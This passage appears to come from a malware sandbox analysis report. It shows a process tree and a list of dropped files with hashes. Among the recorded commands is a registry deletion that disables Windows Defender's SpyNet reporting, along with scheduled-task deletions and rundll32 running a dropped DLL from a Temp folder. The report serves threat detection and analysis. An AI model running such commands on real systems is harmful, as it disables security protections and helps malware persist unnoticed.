C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:748
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bdrESRlZGEayfzFZZ"2⤵PID:732
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UQvARBrwpbLJoyHM\VLPuLoua\kfashfr.dll",#1 /nTsite_idtgD 3851181⤵PID:3392
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\UQvARBrwpbLJoyHM\VLPuLoua\kfashfr.dll",#1 /nTsite_idtgD 3851182⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:4920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "jRVNJXEqUfFueAuNO"3⤵PID:3376
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ffc10224a6db7c76eff88cadd1bea9d4
SHA1d911c431252698a7ee2eaf31d4126c7b1da570f6
SHA256246e87f177acd566f0bdd561276f868035019b8c05c529a28904396d6894fde3
SHA512dff03e6eef01746d7992b0dfca722c4b16e5826e7b26425ce472a0f276832147fbefed002840286639553e1f4f4fa032acf9ee164fd827d210d7abdb50f1dcde
-
Filesize
2KB
MD539c9c4d9aebbdb0534a72be8b40117c2
SHA123f67d10feb9cadc2ee61919e16b1f62e80a583a
SHA256db57c5752f080e0c8dea4b6d2c4b8cdb551609500ffb09effb48863195ecf606
SHA512b7895c1467fc5ea38d6b30272e9fbab04b16d7f64575ce5e513ad308955227b9b1c30ca0963f38721311d23acb0dddfda27b83148cb47ada21bae7d4c6dbafe7
-
Filesize
2KB
MD58620b51d32fd48e624fd8137e3c93c66
SHA1a922db7866f6342216c529f91dbd678ba99253f3
SHA25616a90a9b12b772b37151f084aae87370e80616dbcb47cd9b656dfafbcb23a2c0
SHA51276f059a7e62997cb1463fdccd6cb75cfc870851400c326734abc1c72b571105504459f057137b499a664b45d6255be27d5f679ed8da626c924c8771b90d2e2d9
-
Filesize
2KB
MD5f5df0d5cd670813b9d1ab8212eccf4a5
SHA1582ffbc70dffe3c89503c850f011ccf250863cc4
SHA2563001fb320901d0547e25ff8f1ded31726e799db547e7e0a5241b5eabe69ff6f1
SHA512a418474b4ef933e0f68c9a96de6175b7ed48d438f939ee668bdb0397893955c6e9fe53df99c15b1778ff784c403c9984cf192e12258957eff6e087f8d823c94c
-
Filesize
1.1MB
MD50c5a55947d4af4c7f816413cfa87988a
SHA195c76630813c24e17ca1cc8389c18ae4d791e008
SHA2560317c91ff595ac4caccf3b5c87b5cde2c5d1626b7030f76a6c1a36cfed067e90
SHA512bc7d78377c8b12db30b9f86f3e30989ac0110e24209c0b6b482247baf24ac49dc3751a0c6dbd343cfc8b4cee57c3b6a1d3f2ed2f88d51c35b8950287dcb61868
-
Filesize
2KB
MD500306ef869a783dbebabbc8ecc9dee6f
SHA1801c8e64c047e42ad235202a89fd88e65fe6c551
SHA2566e363032e1d565f2583fa20fb5fb2a1550a746b9b89f64b952795b779ab360af
SHA51239fa8ad4723224f93148fcbe22a2ae3aa9f75b3f29487c178faa3de0e3249bde72c32f2e135c302f2304169290f824925f811165e2a556e9f43f99472a5538f8
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fil\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_PT\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD54cb2c606d2b12fc7e79858887da90b3c
SHA1547b0dd4c9990a0cce14edb21461356defea7ee2
SHA256d56fb36d28396389b57f492b47d4101aecfe735efd1dbc86b2b4f0b5950b69e4
SHA51227cd09c98f74908131d17b761be01de467a0b0e5505f94abe61cca1807930422822e96a97bc02f9a79947c40d9c8b0296e02dc12464251346381898c8adbcf4b
-
Filesize
28KB
MD50f5684652c6d7b6c83eb2214bd82f1b7
SHA18470b23ee7cacec281775c2aeb662877f5c268d2
SHA256cf5cccee4a9b7a252c4e4ea1af4f85891f495f1d3782818f84adf265251d375e
SHA5127f0893608e0b4bff45d2f2d9c1ea7002cbcef8c4f7f207c94a9ceb9a3a5b4bcd23f8e3d5f73aee403c03af2cd34b201a3af42db0f6443a8ee196497099704efb
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json
Filesize151B
MD5bd6b60b18aee6aaeb83b35c68fb48d88
SHA19b977a5fbf606d1104894e025e51ac28b56137c3
SHA256b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA5123500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b
-
Filesize
9KB
MD5f33866cae1774e105a1498d583ee8918
SHA1f578ee44c2cc2587e4d42ef1c17d103894f83b8d
SHA2561c14e3fe785d89c29a5d37e1061faa595474da1142206f280845b51f5eb4c006
SHA512a9d238e344e85882796170acbab6d8ffd72cb68be6a09a741211526e8cb550ebff3e71b687802ebb3b58db00b2953e178e47d376274b362023243dc49d10c034
-
Filesize
64B
MD5d8b9a260789a22d72263ef3bb119108c
SHA1376a9bd48726f422679f2cd65003442c0b6f6dd5
SHA256d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc
SHA512550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b
-
Filesize
6.1MB
MD5486ca04b3513b09e2ef54b9512a36869
SHA1d1e4d3d4f8cb398cbaaf5a1a55336be0312f58e2
SHA25633272f5e646ef2b11df70c9be98f82a29bac35cbf9ea52ae918c479906bf6cd4
SHA5122a8b674ead93404e8dda0cf7ffb94679870f49abb842b8dd9e6313c08e009385cf2781036aab88ad0c762f45232f1d45c8534197c88ca639ccf5f3c744108627
-
Filesize
6.1MB
MD5486ca04b3513b09e2ef54b9512a36869
SHA1d1e4d3d4f8cb398cbaaf5a1a55336be0312f58e2
SHA25633272f5e646ef2b11df70c9be98f82a29bac35cbf9ea52ae918c479906bf6cd4
SHA5122a8b674ead93404e8dda0cf7ffb94679870f49abb842b8dd9e6313c08e009385cf2781036aab88ad0c762f45232f1d45c8534197c88ca639ccf5f3c744108627
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
7KB
MD52bbe8ba6ee7c9fccde1920c6e4b3e936
SHA10626c7bf027fb03d2118fd08077cb229177c457e
SHA25630dcd63bcab506d94abd7275ad571ef28e4ba306b0528dea789ceba1f846f4e2
SHA512ed62f4b9dd3910bf589f493065fbc46a28f84549edb64e3ea3b757cd5e02fa69081b60291afa89a5ca4a34ea7459f69312603851e6bd6353ea6eb6d4e9292900
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize1KB
MD533b19d75aa77114216dbc23f43b195e3
SHA136a6c3975e619e0c5232aa4f5b7dc1fec9525535
SHA256b23ced31b855e5a39c94afa1f9d55b023b8c40d4dc62143e0539c6916c12c9d2
SHA512676fa2fd34878b75e5899197fe6826bb5604541aa468804bc9835bd3acabed2e6759878a8f1358955413818a51456816e90f149133828575a416c2a74fc7d821
-
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize11KB
MD5e9670fd3e2c4998114241ee87b07b341
SHA19d90f324a4dad2c815f35a7a158244b895546457
SHA25644078f56e9e3b8f11d7bf056dd7d4ec56aa9b6e7af1b474ba61ab7ec6573cbd5
SHA51231d9e78f4ae5181569ed4207256879d7f587b111420d02f6de0a32f5aa619ac7a049512752ae1175c4e11b97bf77aab0b3b428d1630ace859f7a9420e09e21df
-
Filesize
6.1MB
MD5c2dd8b4cdb11900bbb6dc798fbe304c7
SHA12a4da4566a05cb400c9302fa304939ea25bb202f
SHA256977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5
SHA512d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e
-
Filesize
6.1MB
MD5c2dd8b4cdb11900bbb6dc798fbe304c7
SHA12a4da4566a05cb400c9302fa304939ea25bb202f
SHA256977af9828acf0d5e2f396c4bdb806079f76f55027b6808440ca0f406a9ec3ab5
SHA512d86d1dd41e9289fbafd8a44c6215a4d5d3c71da9ed8ffd643b013a6ce2d37d9b9736eb2b57a059920c07177e946b42a68ef8283630dcbd7a27e83a1994b71b6e
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6.9MB
MD547c4dd2768297f42bcd2b0997b51e93e
SHA16a908c0265092cbf4be994d0a11c6491a62be4ef
SHA2568d1f848ced192fcf9aff42a3d3f4e98fd97c17ef4155abc565a70cbe238ee754
SHA512af83ee73997fbc764f7fee3440c41c648f5298cd048b23a0d7383b33b70bd9b43d9cf917daad344830eccc1f747b3c9d27daf0a3b50aaee62f898a1ba2927dc9
-
Filesize
6KB
MD54e1a83e7759073d56e258b4a910cf62e
SHA11db40e06606e1d51dda2459df44bfa638770f2f9
SHA256bd9a49eaf39752f8fe63ede63738e3f03c5f7c6ab2ee1ea4e6f11b057e788b29
SHA5120dbaf9bb84b49661881dc463c5f508da01a3d75fbf0385171f64a13c3eea332396e02c95bd037dfbda20f12e0a63c739077b2cab2f2f2be8683122a0af90b482
-
Filesize
268B
MD5a62ce44a33f1c05fc2d340ea0ca118a4
SHA11f03eb4716015528f3de7f7674532c1345b2717d
SHA2569f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a
SHA5129d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732